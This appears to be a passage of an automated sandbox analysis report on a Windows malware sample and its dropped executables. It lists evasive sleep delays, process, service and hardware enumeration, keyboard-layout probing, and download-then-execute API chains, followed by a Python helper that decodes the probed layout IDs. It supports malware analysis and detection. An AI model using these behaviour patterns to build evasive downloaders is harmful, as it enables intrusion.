              Source: C:\Windows\Temp\server.exe | Code function: 3_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle, 3_2_100018A0
              Source: C:\Windows\Temp\server.exe | Code function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc, 3_2_10010760
              Source: C:\Windows\Temp\v5.exe | Code function: 6CFC6DE0,LoadLibraryA,6CFC6DE0,LoadLibraryA,6CFC6DE0,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegQueryValueExA,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount, 2_2_00406090
              Source: C:\Windows\Temp\v5.exe | Code function: GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount, 4_2_00406090
              Source: C:\Windows\Temp\ .exe | Code function: GetAdaptersInfo,GetAdaptersInfo, 5_2_0042E9F0
              Source: C:\Windows\Temp\ .exe | Code function: SetTimer,GetAdaptersInfo, 5_2_0042F050
              Source: C:\Windows\Temp\server.exe | Thread delayed: delay time: 180000
              Source: C:\Windows\Temp\server.exe | Thread delayed: delay time: 1200000
              Source: C:\Windows\System32\conhost.exe | Window / User API: threadDelayed 1005
              Source: C:\Windows\System32\conhost.exe | Window / User API: threadDelayed 496
              Source: C:\Windows\Temp\v5.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_2-1569
              Source: C:\Windows\Temp\server.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_3-19546
              Source: C:\Windows\Temp\v5.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_2-1891
              Source: C:\Windows\Temp\server.exe | Code function: 3_2_100022F0 3_2_100022F0
              Source: C:\Windows\Temp\server.exe TID: 7712 | Thread sleep time: -180000s >= -30000s
              Source: C:\Windows\Temp\server.exe TID: 7832 | Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\Temp\server.exe TID: 7804 | Thread sleep count: 234 > 30
              Source: C:\Windows\Temp\server.exe TID: 7804 | Thread sleep time: -117000s >= -30000s
              Source: C:\Windows\Temp\server.exe TID: 7832 | Thread sleep time: -1200000s >= -30000s
              Source: C:\Windows\Temp\v5.exe TID: 7880 | Thread sleep count: 181 > 30
              Source: C:\Windows\Temp\v5.exe TID: 7880 | Thread sleep time: -36200s >= -30000s
              Source: C:\Windows\Temp\v5.exe TID: 7972 | Thread sleep time: -54000s >= -30000s
              Source: C:\Windows\Temp\v5.exe TID: 7880 | Thread sleep count: 182 > 30
              Source: C:\Windows\Temp\v5.exe TID: 7880 | Thread sleep time: -36400s >= -30000s
              Source: C:\Windows\Temp\v5.exe TID: 7940 | Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041C
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001401
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003C01
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C01
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000801
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C01
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003401
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003001
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001001
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001801
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002001
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00004001
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000401
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002801
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C01
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003801
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002401
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000423
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000402
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C04
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001404
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000804
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001004
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000404
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041A
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000405
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000406
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000465
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000813
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000413
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C09
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002809
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001009
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002409
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001809
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002009
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001409
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003409
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C09
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C09
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000809
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000409
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003009
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000425
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000429
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040B
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000080C
              Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C0C
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040CJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000140CJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000180CJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000100CJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C07Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000407Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001407Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001007Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000807Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000408Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040DJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000439Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040EJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000421Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000410Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000810Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000411Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000044BJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000043FJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000412Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000440Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000426Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000427Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000083EJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000043EJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000450Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000414Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000415Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000416Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000816Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000418Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000419Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C1AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000081AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041BJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000424Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C0AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000400AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000340AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000240AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000140AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C0AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000300AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000440AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000100AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000480AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000080AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00004C0AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000180AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003C0AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000280AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000500AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C0AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000380AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000200AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000441Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000081DJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041DJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000045AJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041EJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041FJump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000422Jump to behavior
              Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000042AJump to behavior
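The layout IDs in the key names above are Windows KLIDs, whose low 16 bits are a LANGID (primary language in bits 0-9, sublanguage in bits 10-15). Decoding them shows that the first four keys the dropped " .exe" opens are the Macau, PRC, Singapore and Taiwan Chinese layouts before it walks through English, Spanish, French and the rest. Reading these keys is also ordinary behaviour for locale-aware software and for any code translating virtual-key codes per layout, so the signal is the breadth and ordering of the probe, not a single key. The following is an added example written for this page, not code from the report or from the sample; the language tables are the winnt.h LANG_ and SUBLANG_CHINESE_ constants, and the sample rows are a constructed subset of the rows listed above.

```python
import re
from collections import OrderedDict

# Constructed sample: a subset of the "Key opened" rows listed above, re-typed
# as test input. The regex only needs the trailing layout ID, so the raw
# report text parses the same way.
SAMPLE_ROWS = r"""
Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001404
Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000804
Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000404
Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000409
Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000809
Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000419
Source: C:\Windows\Temp\ .exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000411
"""

# Primary-language IDs from winnt.h (LANG_*), limited to the ones this report probes.
PRIMARY_LANG = {0x04: "Chinese", 0x07: "German", 0x09: "English", 0x0A: "Spanish",
                0x0C: "French", 0x10: "Italian", 0x11: "Japanese", 0x12: "Korean",
                0x16: "Portuguese", 0x19: "Russian"}
# SUBLANG_CHINESE_* values from winnt.h.
CHINESE_SUBLANG = {0x01: "Traditional (Taiwan)", 0x02: "Simplified (PRC)",
                   0x03: "Hong Kong", 0x04: "Singapore", 0x05: "Macau"}


def decode_klid(klid_hex):
    """Split a keyboard layout ID into its LANGID parts.

    The low 16 bits of a KLID are a LANGID packed the way MAKELANGID does it:
    bits 0-9 primary language, bits 10-15 sublanguage. The high 16 bits
    identify the layout/IME and are zero for every key in this report.
    """
    klid = int(klid_hex, 16)
    langid = klid & 0xFFFF
    primary = langid & 0x3FF
    sublang = (langid >> 10) & 0x3F
    name = PRIMARY_LANG.get(primary, "lang_0x%02x" % primary)
    if primary == 0x04:
        name += " " + CHINESE_SUBLANG.get(sublang, "sub_0x%02x" % sublang)
    return {"klid": klid, "langid": langid, "primary": primary,
            "sublang": sublang, "layout": klid >> 16, "name": name}


KLID_RE = re.compile(r"Keyboard Layouts\\([0-9A-Fa-f]{8})")


def extract_klids(text):
    """Layout IDs in the order the process opened them."""
    return [m.group(1).upper() for m in KLID_RE.finditer(text)]


def by_language(text):
    """Group the probed layouts by primary language, preserving first-seen order."""
    groups = OrderedDict()
    for k in extract_klids(text):
        primary = decode_klid(k)["primary"]
        label = PRIMARY_LANG.get(primary, "lang_0x%02x" % primary)
        groups.setdefault(label, []).append(k)
    return groups


def leading_language(text, n=3):
    """Primary language shared by the first n probes, or None if they differ."""
    names = {PRIMARY_LANG.get(decode_klid(k)["primary"]) for k in extract_klids(text)[:n]}
    return names.pop() if len(names) == 1 else None
```

Run `by_language()` over the full report text to see every language family the sample enumerates; `leading_language()` captures the ordering observation (Chinese variants first) that a single-key signature would miss.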
Source: C:\Windows\Temp\ .exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem WHERE Name="user-PC"
Source: C:\Windows\Temp\server.exe | Last function: Thread delayed
Source: C:\Windows\Temp\server.exe | Last function: Thread delayed
Source: C:\Windows\Temp\v5.exe | Last function: Thread delayed
Source: C:\Windows\Temp\v5.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Code function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405302
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Code function: 0_2_0040263E FindFirstFileA,0_2_0040263E
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Code function: 0_2_00405CD8 FindFirstFileA,FindClose,0_2_00405CD8
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,3_2_10001A20
Source: C:\Windows\Temp\server.exe | Code function: 3_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,3_2_100014B0
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,3_2_10008B50
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,3_2_10008520
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10008E40 FindFirstFileA,FindClose,FindClose,3_2_10008E40
Source: C:\Windows\Temp\server.exe | Code function: 3_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_100086F0
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,3_2_10008F00
Source: C:\Windows\Temp\ .exe | Code function: 5_2_0045B051 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,5_2_0045B051
Source: C:\Windows\Temp\ .exe | Code function: 5_2_00405260 FindFirstFileA,GetFileAttributesA,SetFileAttributesA,RemoveDirectoryA,DeleteFileA,FindNextFileA,FindClose,5_2_00405260
Source: C:\Windows\Temp\ .exe | Code function: 5_2_00439D40 #17,__time32,FindFirstFileA,DeleteFileA,5_2_00439D40
